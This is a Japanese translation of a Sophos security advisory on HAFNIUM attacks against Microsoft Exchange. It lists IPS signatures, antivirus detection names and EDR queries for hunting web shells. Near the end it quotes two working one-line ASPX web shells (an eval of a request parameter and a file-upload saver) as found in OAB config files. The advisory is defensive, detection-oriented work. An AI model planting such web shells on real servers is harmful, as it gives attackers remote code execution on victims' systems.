製品とサービス 製品とサービス

HAFNIUM (ハフニウム) による攻撃からのソフォスの顧客の保護について

ソフォスのお客様は、Microsoft Exchange Serverに影響を与える新たなゼロデイ脆弱性の悪用から既に保護されています。

** 本記事は、Protecting Sophos customers from HAFNIUM の翻訳です。最新の情報は英語記事をご覧ください。**

Microsoft Exchange に影響する 4 つの新たなゼロデイの脆弱性が、国家支援型と考えられているサイバー攻撃組織であるHAFNIUM (ハフニウム) によって現在攻撃されています。

オンプレミスで Exchange Server を実行している場合は、速やかにパッチを適用し、セキュリティ侵害の痕跡がないかネットワークを調査する必要 があります。

HAFNIUM に対するソフォスの保護

Sophos MTR、およびソフォスのネットワークセキュリティ製品、エンドポイントセキュリティ製品を利用されているお客様は、いくつもの機能によって、これらの新しい脆弱性に対する攻撃から保護されています。

Sophos MTR

The Sophos MTR チームは、これらの脆弱性が公開されてから、関連する攻撃についてお客様の環境を監視しています。これらの脆弱性に関連する攻撃が特定された場合、インシデントケースが作成され、お客様に通知されます。

Sophos Firewall

SophosLabs は、SFOS および XFOS を実行しているお客様向けに IPS シグネチャを公開しました。

CVE SID
CVE-2021-26855 57241, 57242, 57243, 57244, 2305106, 2305107
CVE-2021-26857 57233, 57234
CVE-2021-26858 57245, 57246
CVE-2021-27065 57245, 57246

 

ネットワークでこれらの検出名が表示された場合は、詳細に調査し、修正する必要があります。

Sophos Intercept X Advanced および Sophos Antivirus (SAV)

お客様は、以下のアンチウイルスシグネチャによる検出名で、HAFNIUM による攻撃を検出できます。

Web shell 関連

  • Troj/WebShel-L
  • Troj/WebShel-M
  • Troj/WebShel-N
  • Troj/ASPDoor-T
  • Troj/AspScChk-A

その他のペイロード

  • ATK/Pivot-B
  • AMSI/PowerCat-A (Powercat)
  • AMSI/PSRev-A (Invoke-PowerShellTcpOneLine reverse shell)

Web シェルには、動的な性質があります。これらのシェルはブロックされますが、手動で削除する必要があります。ネットワークでこれらの検出名が表示された場合は、詳細に調査し、修正する必要があります。

また、関連する C&C サーバーの IP の宛先についてもブロックしました。

さらに、攻撃の lsass ダンプのステージは、認証情報の保護機能 (CredGuard) によってブロックされます。この機能は、すべての Intercept X Advanced サブスクリプションで利用できます。

Sophos EDR

Sophos EDR のお客様は、すでに準備されているクエリを利用して、攻撃に利用されている可能性がある Web シェルを特定して調査できます。

/* Query for known web shell names */
SELECT
datetime(btime,'unixepoch') AS created_time,
filename,
directory,
size AS fileSize,
datetime(atime, 'unixepoch') AS access_time,
datetime(mtime, 'unixepoch') AS modified_time
FROM file
WHERE
(path LIKE 'C:\inetpub\wwwroot\aspnet_client\%' OR path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%' OR path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%')
AND filename IN ('web.aspx','help.aspx','document.aspx','errorEE.aspx','errorEEE.aspx','errorEW.aspx','errorFF.aspx','web.aspx','healthcheck.aspx','aspnet_www.aspx','aspnet_client.aspx','xx.aspx','shell.aspx','aspnet_iisstart.aspx','one.aspx','errorcheck.aspx','t.aspx','discover.aspx','aspnettest.aspx','error.aspx','RedirSuiteServerProxy.aspx','shellex.aspx','supp0rt.aspx','HttpProxy.aspx','system_web.aspx','OutlookEN.aspx','TimeoutLogout.aspx','Logout.aspx','OutlookJP.aspx','MultiUp.aspx','OutlookRU.aspx');
/* Query for web shells with randomized 8 character names */
SELECT
datetime(btime,'unixepoch') AS created_time,
regex_match(filename, '[0-9a-zA-Z]{8}.aspx', 0) AS filename,
directory,
size AS fileSize,
datetime(atime, 'unixepoch') AS access_time,
datetime(mtime, 'unixepoch') AS modified_time
FROM file
WHERE (path LIKE 'C:\inetpub\wwwroot\aspnet_client\%' OR path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%' OR path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%');

このクエリで検出された Web シェルを表示すると、通常、Exchange オフラインアドレス帳 (OAB) の構成ファイル内の ExternalUrl フィールドにこの Web シェルが表示されます。例:

ExternalUrl : http://f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“key-here”],”unsafe”);}</script>

ExternalUrl: http://g/<script Language=”c#” runat=”server”>void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(“error.aspx”));}}</script>

 

セキュリティ侵害の痕跡の特定

Sophos MTR チームは、ネットワークを調査して、セキュリティ侵害の痕跡を特定する方法について、詳しい手順を記載したガイド を公開しています。

コメントを残す

Your email address will not be published. Required fields are marked *